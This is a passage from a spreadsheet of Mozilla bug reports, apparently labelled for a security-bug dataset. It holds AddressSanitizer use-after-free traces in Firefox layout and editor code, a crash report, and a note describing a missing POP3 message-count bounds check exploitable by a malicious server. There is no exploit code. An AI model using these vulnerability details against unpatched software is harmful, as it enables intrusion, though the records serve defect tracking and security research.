    #28 0x7fac25e38889 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #29 0x7fac25e38889 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #30 0x7fac2fa30aa4 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:721:34
    #31 0x4f6f2c in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #32 0x4f6f2c in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #33 0x7fac4387f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:313:26 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;)
Shadow bytes around the buggy address:
  0x0c1080003350: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c1080003360: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c1080003370: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c1080003380: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c1080003390: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
=&gt;0x0c10800033a0: fa fa fa fa fd fd[fd]fd fd fd fd fd fd fd fd fa
  0x0c10800033b0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c10800033c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c10800033d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c10800033e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c10800033f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00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28373==ABORTING</t>
        </is>
      </c>
      <c r="X5878" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5879">
      <c r="A5879" t="n">
        <v>1509281</v>
      </c>
      <c r="B5879" t="inlineStr">
        <is>
          <t>2018-11-22 02:31:53 -0800</t>
        </is>
      </c>
      <c r="C5879" t="inlineStr">
        <is>
          <t>Insufficient scopes for retriggering and backfilling</t>
        </is>
      </c>
      <c r="D5879" t="inlineStr">
        <is>
          <t>2018-11-23 02:40:55 -0800</t>
        </is>
      </c>
      <c r="E5879" t="n">
        <v>1</v>
      </c>
      <c r="F5879" t="n">
        <v>1</v>
      </c>
      <c r="G5879" t="n">
        <v>5</v>
      </c>
      <c r="H5879" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5879" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J5879" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5879" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5879" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5879" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5879" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5879" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5879" t="inlineStr"/>
      <c r="Q5879" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5879" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5879" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5879" t="n">
        <v>1</v>
      </c>
      <c r="U5879" t="n">
        <v>0</v>
      </c>
      <c r="V5879" t="n">
        <v>12</v>
      </c>
      <c r="W5879" t="inlineStr">
        <is>
          <t>Created attachment 9026918
tree-error.png
fstrugariu@mozilla.com gets the error message I've attached when trying to backfill a Talos job.
Also, he's not able to retrigger jobs either.
We need him to have the appropriate rights to do Perf sheriffing.</t>
        </is>
      </c>
      <c r="X5879" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5880">
      <c r="A5880" t="n">
        <v>803853</v>
      </c>
      <c r="B5880" t="inlineStr">
        <is>
          <t>2012-10-20 09:22:24 -0700</t>
        </is>
      </c>
      <c r="C5880" t="inlineStr">
        <is>
          <t>[FIX] Heap-use-after-free in ~nsHTMLEditRules</t>
        </is>
      </c>
      <c r="D5880" t="inlineStr">
        <is>
          <t>2024-05-30 07:34:13 -0700</t>
        </is>
      </c>
      <c r="E5880" t="n">
        <v>1</v>
      </c>
      <c r="F5880" t="n">
        <v>1</v>
      </c>
      <c r="G5880" t="n">
        <v>3</v>
      </c>
      <c r="H5880" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5880" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5880" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K5880" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5880" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5880" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5880" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5880" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5880" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q5880" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5880" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5880" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T5880" t="n">
        <v>1</v>
      </c>
      <c r="U5880" t="n">
        <v>0</v>
      </c>
      <c r="V5880" t="n">
        <v>49</v>
      </c>
      <c r="W5880" t="inlineStr">
        <is>
          <t>Created attachment 673576
Testcase
Reproduces on trunk by starting multiple firefox instances (~ 4-5) with the testcase on command line.
=================================================================
==25662== ERROR: AddressSanitizer heap-use-after-free on address 0x7fed9ab46400 at pc 0x7fedd68877a0 bp 0x7fffd167aef0 sp 0x7fffd167aee8
READ of size 8 at 0x7fed9ab46400 thread T0
    #0 0x7fedd688779f in ~nsHTMLEditRules editor/libeditor/html/nsHTMLEditRules.cpp:212
    #1 0x7fedd688745c in ~nsHTMLEditRules editor/libeditor/html/nsHTMLEditRules.cpp:205
    #2 0x7fedd623fec4 in nsTextEditRules::Release() editor/libeditor/text/nsTextEditRules.cpp:93
    #3 0x7fedd6887bc7 in nsHTMLEditRules::Release() editor/libeditor/html/nsHTMLEditRules.cpp:220
    #4 0x7fedd69ab0bd in nsRunnableMethodReceiver&lt;nsHTMLEditRules, true&gt;::Revoke() ../../../dist/include/nsThreadUtils.h:304
    #5 0x7fedd69ab596 in ~nsRunnableMethodReceiver ../../../dist/include/nsThreadUtils.h:303
    #6 0x7fedd69ab376 in ~nsRunnableMethodReceiver ../../../dist/include/nsThreadUtils.h:303
    #7 0x7fedd69ab25d in nsRunnableMethodImpl&lt;void (nsHTMLEditRules::*)(), true&gt;::~nsRunnableMethodImpl() ../../../dist/include/nsThreadUtils.h:333
    #8 0x7fedd69aac06 in nsRunnableMethodImpl&lt;void (nsHTMLEditRules::*)(), true&gt;::~nsRunnableMethodImpl() ../../../dist/include/nsThreadUtils.h:333
    #9 0x7fedd69aad3c in nsRunnableMethodImpl&lt;void (nsHTMLEditRules::*)(), true&gt;::~nsRunnableMethodImpl() ../../../dist/include/nsThreadUtils.h:333
    #10 0x7feddcc16022 in nsRunnable::Release() objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:30
    #11 0x7fedcf72428b in ~nsCOMPtr_base xpcom/build/../glue/nsCOMPtr.h:408
    #12 0x7fedcf7c54e9 in nsCOMPtr&lt;nsIRunnable&gt;::~nsCOMPtr() ../../../dist/include/nsCOMPtr.h:447
    #13 0x7fedcf7c0cc6 in nsCOMPtr&lt;nsIRunnable&gt;::~nsCOMPtr() ../../../dist/include/nsCOMPtr.h:447
    #14 0x7fedd0a3b3b6 in nsTArrayElementTraits&lt;nsCOMPtr&lt;nsIRunnable&gt; &gt;::Destruct(nsCOMPtr&lt;nsIRunnable&gt;*) ../../dist/include/nsTArray.h:359
    #15 0x7fedd0a3b121 in nsTArray&lt;nsCOMPtr&lt;nsIRunnable&gt;, nsTArrayDefaultAllocator&gt;::DestructRange(unsigned int, unsigned int) ../../dist/include/nsTArray.h:1223
    #16 0x7fedd0a3ab88 in nsTArray&lt;nsCOMPtr&lt;nsIRunnable&gt;, nsTArrayDefaultAllocator&gt;::RemoveElementsAt(unsigned int, unsigned int) ../../dist/include/nsTArray.h:943
    #17 0x7fedd2f8aa9b in nsContentUtils::RemoveScriptBlocker() content/base/src/nsContentUtils.cpp:5007
    #18 0x7fedd14abc6e in ~nsAutoScriptBlocker ../../../dist/include/nsContentUtils.h:2315
    #19 0x7fedd14973d6 in ~nsAutoScriptBlocker ../../../dist/include/nsContentUtils.h:2314
    #20 0x7fedd31ab405 in nsDocument::AdoptNode(nsIDOMNode*, nsIDOMNode**) content/base/src/nsDocument.cpp:6410
    #21 0x7fedd83b0bab in nsIDOMDocument_AdoptNode(JSContext*, unsigned int, JS::Value*) objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:1453
    #22 0x7fede44440a9 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:364
    #23 0x7fede43f3cc0 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) js/src/jsinterp.cpp:2372
    #24 0x7fede4352cbe in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) js/src/jsinterp.cpp:324
    #25 0x7fede44518ad in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) js/src/jsinterp.cpp:510
    #26 0x7fede445353b in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/jsinterp.cpp:547
    #27 0x7fede3b67a5d in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) js/src/jsapi.cpp:5702
    #28 0x7fedd527e52e in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) dom/base/nsJSEnvironment.cpp:1507
    #29 0x7fedd543a736 in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) dom/base/nsGlobalWindow.cpp:9701
    #30 0x7fedd53f0c34 in nsGlobalWindow::RunTimeout(nsTimeout*) dom/base/nsGlobalWindow.cpp:9960
    #31 0x7fedd54385e8 in nsGlobalWindow::TimerCallback(nsITimer*, void*) dom/base/nsGlobalWindow.cpp:10227
    #32 0x7feddcfc3b02 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:472
    #33 0x7feddcfc500a in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:555
    #34 0x7feddcf88710 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:612
    #35 0x7feddcc1957b in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #36 0x7feddb5a75d6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #37 0x7feddd2662c1 in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:215
    #38 0x7feddd2660f6 in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:208
    #39 0x7feddd265fdb in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:182
    #40 0x7feddaa4da7a in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #41 0x7fedd967cc54 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:290
    #42 0x7fedcf7604bd in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3792
    #43 0x7fedcf766335 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3858
    #44 0x7fedcf7691e4 in XRE_main toolkit/xre/nsAppRunner.cpp:3933
    #45 0x40bb13 in do_main(int, char**) browser/app/nsBrowserApp.cpp:174
    #46 0x409255 in main browser/app/nsBrowserApp.cpp:279
    #47 0x7fedee6bf76c in ?? ??:0
0x7fed9ab46400 is located 0 bytes inside of 824-byte region [0x7fed9ab46400,0x7fed9ab46738)
freed by thread T0 here:
    #0 0x4c3660 in __interceptor_free ??:?
    #1 0x7fedebd38406 in moz_free memory/mozalloc/mozalloc.cpp:51
    #2 0x7fedd678db5d in operator delete(void*) ../../../dist/include/mozilla/mozalloc.h:224
    #3 0x7fedd6275a84 in nsEditor::Release() editor/libeditor/base/nsEditor.cpp:211
    #4 0x7fedd6795bd7 in nsHTMLEditor::Release() editor/libeditor/html/nsHTMLEditor.cpp:203
    #5 0x7fedcf72428b in ~nsCOMPtr_base ../../../../dist/include/nsCOMPtr.h:408
    #6 0x7fedd1a97149 in nsCOMPtr&lt;nsIEditor&gt;::~nsCOMPtr() ../../../dist/include/nsCOMPtr.h:447
    #7 0x7fedd1a7f6e6 in nsCOMPtr&lt;nsIEditor&gt;::~nsCOMPtr() ../../../dist/include/nsCOMPtr.h:447
    #8 0x7fedd9cbc0e2 in ~nsEditorSpellCheck editor/composer/src/nsEditorSpellCheck.cpp:219
    #9 0x7fedd9cbbecc in ~nsEditorSpellCheck editor/composer/src/nsEditorSpellCheck.cpp:215
    #10 0x7fedd9cb9254 in nsEditorSpellCheck::Release() editor/composer/src/nsEditorSpellCheck.cpp:193
    #11 0x7fedcf72428b in ~nsCOMPtr_base ../../../../dist/include/nsCOMPtr.h:408
    #12 0x7fedd631c389 in nsCOMPtr&lt;nsIEditorSpellCheck&gt;::~nsCOMPtr() ../../../dist/include/nsCOMPtr.h:447
    #13 0x7fedd6295f86 in nsCOMPtr&lt;nsIEditorSpellCheck&gt;::~nsCOMPtr() ../../../dist/include/nsCOMPtr.h:447
    #14 0x7feddb0484dd in ~mozInlineSpellChecker extensions/spellcheck/src/mozInlineSpellChecker.cpp:506
    #15 0x7feddb0481cc in ~mozInlineSpellChecker extensions/spellcheck/src/mozInlineSpellChecker.cpp:505
    #16 0x7feddb0456b4 in mozInlineSpellChecker::Release() extensions/spellcheck/src/mozInlineSpellChecker.cpp:479
    #17 0x7feddb0701cb in ~nsRefPtr ../../../dist/include/nsAutoPtr.h:874
    #18 0x7feddb06ffd6 in ~nsRefPtr ../../../dist/include/nsAutoPtr.h:872
    #19 0x7feddb06fece in mozInlineSpellStatus::~mozInlineSpellStatus() extensions/spellcheck/src/mozInlineSpellChecker.h:33
    #20 0x7feddb051d96 in mozInlineSpellStatus::~mozInlineSpellStatus() extensions/spellcheck/src/mozInlineSpellChecker.h:33
    #21 0x7feddb06ec3d in mozInlineSpellResume::~mozInlineSpellResume() extensions/spellcheck/src/mozInlineSpellChecker.cpp:451
    #22 0x7feddb06e926 in mozInlineSpellResume::~mozInlineSpellResume() extensions/spellcheck/src/mozInlineSpellChecker.cpp:451
    #23 0x7feddb06ea5c in mozInlineSpellResume::~mozInlineSpellResume() extensions/spellcheck/src/mozInlineSpellChecker.cpp:451
    #24 0x7feddcc16022 in nsRunnable::Release() objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:30
    #25 0x7fedcf72428b in ~nsCOMPtr_base ../../../../dist/include/nsCOMPtr.h:408
    #26 0x7fedcf7c54e9 in nsCOMPtr&lt;nsIRunnable&gt;::~nsCOMPtr() ../../dist/include/nsCOMPtr.h:447
    #27 0x7fedcf7c0cc6 in nsCOMPtr&lt;nsIRunnable&gt;::~nsCOMPtr() ../../dist/include/nsCOMPtr.h:447
    #28 0x7feddcf88810 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:618
    #29 0x7feddcc1957b in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
previously allocated by thread T0 here:
    #0 0x4c3720 in malloc ??:?
    #1 0x7fedebd3855a in moz_xmalloc memory/mozalloc/mozalloc.cpp:57
    #2 0x7fedd12ca9ee in operator new(unsigned long) ../../dist/include/mozilla/mozalloc.h:200
    #3 0x7feddcc543fb in mozilla::GenericFactory::CreateInstance(nsISupports*, nsID const&amp;, void**) objdir-ff-asan-sym/xpcom/build/GenericFactory.cpp:16
    #4 0x7feddcf3289c in nsComponentManagerImpl::CreateInstanceByContractID(char const*, nsISupports*, nsID const&amp;, void**) xpcom/components/nsComponentManager.cpp:1006
    #5 0x7feddcbde0b9 in CallCreateInstance(char const*, nsISupports*, nsID const&amp;, void**) objdir-ff-asan-sym/xpcom/build/nsComponentManagerUtils.cpp:135
    #6 0x7feddcbdf48b in nsCreateInstanceByContractID::operator()(nsID const&amp;, void**) const objdir-ff-asan-sym/xpcom/build/nsComponentManagerUtils.cpp:178
    #7 0x7feddcbd2ddc in nsCOMPtr_base::assign_from_helper(nsCOMPtr_helper const&amp;, nsID const&amp;) objdir-ff-asan-sym/xpcom/build/nsCOMPtr.cpp:110
    #8 0x7fedd4211b6e in nsCOMPtr&lt;nsIEditor&gt;::operator=(nsCOMPtr_helper const&amp;) ../../../dist/include/nsCOMPtr.h:689
    #9 0x7fedd9c93154 in nsEditingSession::SetupEditorOnWindow(nsIDOMWindow*) editor/composer/src/nsEditingSession.cpp:423
    #10 0x7fedd9c8a600 in nsEditingSession::MakeWindowEditable(nsIDOMWindow*, char const*, bool, bool, bool) editor/composer/src/nsEditingSession.cpp:173
    #11 0x7fedd4a89a3b in nsHTMLDocument::EditingStateChanged() content/html/document/src/nsHTMLDocument.cpp:2658
    #12 0x7fedd4aad55c in nsHTMLDocument::MaybeEditingStateChanged() content/html/document/src/nsHTMLDocument.cpp:2304
    #13 0x7fedd4aadd0d in nsHTMLDocument::EndUpdate(unsigned int) content/html/document/src/nsHTMLDocument.cpp:2317
    #14 0x7fedd6600f0a in nsHtml5TreeOpExecutor::EndDocUpdate() parser/html/nsHtml5TreeOpExecutor.h:248
    #15 0x7fedd6600548 in nsHtml5TreeOpExecutor::DidBuildModel(bool) parser/html/nsHtml5TreeOpExecutor.cpp:131
    #16 0x7fedd65ed858 in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) parser/html/nsHtml5TreeOperation.cpp:639
    #17 0x7fedd6604b05 in nsHtml5TreeOpExecutor::RunFlushLoop() parser/html/nsHtml5TreeOpExecutor.cpp:564
    #18 0x7fedd66411e9 in nsHtml5ExecutorFlusher::Run() parser/html/nsHtml5StreamParser.cpp:127
    #19 0x7feddcf88710 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:612
    #20 0x7feddcc1957b in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #21 0x7feddb5a75d6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #22 0x7feddd2662c1 in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:215
    #23 0x7feddd2660f6 in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:208
    #24 0x7feddd265fdb in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:182
    #25 0x7feddaa4da7a in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #26 0x7fedd967cc54 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:290
    #27 0x7fedcf7604bd in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3792
    #28 0x7fedcf766335 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3858
    #29 0x7fedcf7691e4 in XRE_main toolkit/xre/nsAppRunner.cpp:3933
Shadow byte and word:
  0x1ffdb3568c80: fd
  0x1ffdb3568c80: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ffdb3568c60: fa fa fa fa fa fa fa fa
  0x1ffdb3568c68: fa fa fa fa fa fa fa fa
  0x1ffdb3568c70: fa fa fa fa fa fa fa fa
  0x1ffdb3568c78: fa fa fa fa fa fa fa fa
=&gt;0x1ffdb3568c80: fd fd fd fd fd fd fd fd
  0x1ffdb3568c88: fd fd fd fd fd fd fd fd
  0x1ffdb3568c90: fd fd fd fd fd fd fd fd
  0x1ffdb3568c98: fd fd fd fd fd fd fd fd
  0x1ffdb3568ca0: fd fd fd fd fd fd fd fd
Stats: 271M malloced (1203M for red zones) by 552799 calls
Stats: 45M realloced by 28360 calls
Stats: 233M freed by 308733 calls
Stats: 155M really freed by 234701 calls
Stats: 960M (245847 full pages) mmaped in 240 calls
  mmaps   by size class: 11:313191; 12:4096; 13:1536; 14:1280; 15:256; 16:832; 17:1216; 18:176; 19:40; 20:24;
  mallocs by size class: 11:539587; 12:5764; 13:2495; 14:1669; 15:381; 16:1295; 17:1349; 18:196; 19:41; 20:22;
  frees   by size class: 11:298141; 12:3893; 13:2206; 14:1451; 15:324; 16:1189; 17:1331; 18:141; 19:38; 20:19;
  rfrees  by size class: 11:227507; 12:2307; 13:1313; 14:1203; 15:223; 16:990; 17:1125; 18:28; 19:4; 20:1;
Stats: malloc large: 1608 small slow: 9746
==25662== ABORTING</t>
        </is>
      </c>
      <c r="X5880" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5881">
      <c r="A5881" t="n">
        <v>229374</v>
      </c>
      <c r="B5881" t="inlineStr">
        <is>
          <t>2003-12-24 21:45:45 -0800</t>
        </is>
      </c>
      <c r="C5881" t="inlineStr">
        <is>
          <t>more to do for bug #157644...</t>
        </is>
      </c>
      <c r="D5881" t="inlineStr">
        <is>
          <t>2009-01-22 10:17:31 -0800</t>
        </is>
      </c>
      <c r="E5881" t="n">
        <v>1</v>
      </c>
      <c r="F5881" t="n">
        <v>1</v>
      </c>
      <c r="G5881" t="n">
        <v>3</v>
      </c>
      <c r="H5881" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5881" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J5881" t="inlineStr">
        <is>
          <t>Networking: POP</t>
        </is>
      </c>
      <c r="K5881" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5881" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5881" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N5881" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5881" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5881" t="inlineStr">
        <is>
          <t>fixed-aviary1.0, [sg:fix]</t>
        </is>
      </c>
      <c r="Q5881" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5881" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5881" t="inlineStr">
        <is>
          <t>mozilla1.7final</t>
        </is>
      </c>
      <c r="T5881" t="n">
        <v>1</v>
      </c>
      <c r="U5881" t="n">
        <v>0</v>
      </c>
      <c r="V5881" t="n">
        <v>23</v>
      </c>
      <c r="W5881" t="inlineStr">
        <is>
          <t>more to do for bug #157644...
dan got email from zen-parse@gmx.net, pointing out that the fix for #157644
plugged one security hole, but not them all.
from the reporter:
the correct fix is to limit the number of messages to (MAXINT(sizeof(Pop3MsgInfo))
if an evil server sends a larger number of messages, we'll only allocate space
for 50k.  but if part way through the list, if the server introduces a message
that is &lt; than the max but &gt; 50k, we'll allocate more space.
SendUidl() doesn't bounds check on the 50k message limit.
the patch in bug #157644 assumes that message numbers are sequential.
I've got the complete email from zen-parse.</t>
        </is>
      </c>
      <c r="X5881" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5882">
      <c r="A5882" t="n">
        <v>1578416</v>
      </c>
      <c r="B5882" t="inlineStr">
        <is>
          <t>2019-09-03 07:45:45 -0700</t>
        </is>
      </c>
      <c r="C5882" t="inlineStr">
        <is>
          <t>Crash in [@ mozilla::a11y::HyperTextAccessible::FindOffset]</t>
        </is>
      </c>
      <c r="D5882" t="inlineStr">
        <is>
          <t>2019-09-18 10:20:08 -0700</t>
        </is>
      </c>
      <c r="E5882" t="n">
        <v>1</v>
      </c>
      <c r="F5882" t="n">
        <v>1</v>
      </c>
      <c r="G5882" t="n">
        <v>3</v>
      </c>
      <c r="H5882" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5882" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5882" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K5882" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5882" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5882" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N5882" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5882" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5882" t="inlineStr"/>
      <c r="Q5882" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5882" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5882" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T5882" t="n">
        <v>1</v>
      </c>
      <c r="U5882" t="n">
        <v>0</v>
      </c>
      <c r="V5882" t="n">
        <v>20</v>
      </c>
      <c r="W5882" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-38b40d29-e35d-4b7f-987f-0051d0190902.
Seen while looking at nightly crash stats - crashes started in 20190902094857: https://bit.ly/2lYiFRB. Another similiar signature is https://bit.ly/2lWjVEO
Possible regression range based on build ID: https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=8867e44d49793d8af6b514089cf4b5ebea446985&amp;tochange=4cd56624e723867b1e508d73bd8ee82c899f5670
```
Top 10 frames of crashing thread:
0 xul.dll unsigned int mozilla::a11y::HyperTextAccessible::FindOffset accessible/generic/HyperTextAccessible.cpp:448
1 xul.dll unsigned int mozilla::a11y::HyperTextAccessible::FindOffset accessible/generic/HyperTextAccessible.cpp:481
2 xul.dll unsigned int mozilla::a11y::HyperTextAccessible::FindOffset accessible/generic/HyperTextAccessible.cpp:481
3 xul.dll unsigned int mozilla::a11y::HyperTextAccessible::FindOffset accessible/generic/HyperTextAccessible.cpp:481
4 xul.dll unsigned int mozilla::a11y::HyperTextAccessible::FindOffset accessible/generic/HyperTextAccessible.cpp:481
5 xul.dll unsigned int mozilla::a11y::HyperTextAccessible::FindOffset accessible/generic/HyperTextAccessible.cpp:481
6 xul.dll unsigned int mozilla::a11y::HyperTextAccessible::FindOffset accessible/generic/HyperTextAccessible.cpp:481
7 xul.dll unsigned int mozilla::a11y::HyperTextAccessible::FindOffset accessible/generic/HyperTextAccessible.cpp:481
8 xul.dll unsigned int mozilla::a11y::HyperTextAccessible::FindOffset accessible/generic/HyperTextAccessible.cpp:481
9 xul.dll unsigned int mozilla::a11y::HyperTextAccessible::FindOffset accessible/generic/HyperTextAccessible.cpp:481
```</t>
        </is>
      </c>
      <c r="X5882" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5883">
      <c r="A5883" t="n">
        <v>1422456</v>
      </c>
      <c r="B5883" t="inlineStr">
        <is>
          <t>2017-12-01 18:40:06 -0800</t>
        </is>
      </c>
      <c r="C5883" t="inlineStr">
        <is>
          <t>about:home crashes whole browser (possible memory corruption)</t>
        </is>
      </c>
      <c r="D5883" t="inlineStr">
        <is>
          <t>2020-02-16 17:40:17 -0800</t>
        </is>
      </c>
      <c r="E5883" t="n">
        <v>1</v>
      </c>
      <c r="F5883" t="n">
        <v>1</v>
      </c>
      <c r="G5883" t="n">
        <v>3</v>
      </c>
      <c r="H5883" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5883" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5883" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K5883" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L5883" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5883" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5883" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5883" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5883" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main63+]</t>
        </is>
      </c>
      <c r="Q5883" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5883" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5883" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T5883" t="n">
        <v>1</v>
      </c>
